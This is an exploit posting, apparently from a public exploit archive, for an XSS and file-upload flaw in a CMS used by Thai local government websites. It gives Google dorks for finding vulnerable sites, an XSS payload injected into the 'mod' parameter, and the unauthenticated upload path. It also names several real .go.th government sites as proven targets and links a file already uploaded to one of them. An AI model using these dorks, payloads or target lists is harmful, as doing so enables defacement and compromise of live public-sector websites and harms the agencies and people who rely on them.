# Exploit Title: Tayland government Upload File and Cross Site Scripting Vulnerability # Google Dork: inurl://index.php?mod= # Google Dork: inurl://index.php?mod=help_add # Date: 2018-01-20 # Exploit Author: Iran.Anonymous # Vendor Homepage: http://www.opstech.co.th # Tested on: Windows ******************************************* # Exploit Xss : http://127.0.0.1/index.php?mod="><img src=x onerror=alert(document.domain)>.gif # Exploit Upload File : http://127.0.0.1/index.php?mod=help_add&path=help ******************************************* Proof Xss : http://www.chongsammorlocal.go.th/index.php?mod= http://www.chumsang.go.th/index.php?mod= http://www.cpao.go.th/index.php?mod= http://www.borthong.go.th/index.php?mod= http://www.donong.go.th/index.php?mod= http://www.khokkachai.go.th/index.php?mod= Proof Upload File : http://www.chongsammorlocal.go.th/index.php?mod=help_add&path=help http://www.chumsang.go.th/index.php?mod=help_add&path=help http://www.cpao.go.th/index.php?mod=help_add&path=help http://www.borthong.go.th/index.php?mod=help_add&path=help http://www.donong.go.th/index.php?mod=help_add&path=help http://www.khokkachai.go.th/index.php?mod=help_add&path=help Your upload file: http://www.secpt.go.th/secpt/mainfile/TwQudX4rWJhm.txt ******************************************* # Thanks to : ~~> MR.Khatar || Turk.Khan || Blackwolf_Iran ||Ormazd || Sh@d0w ||Hellish_PN (mamad khodesh) ||Rabinson || Danger BoY # Discovered By: Saman.Khan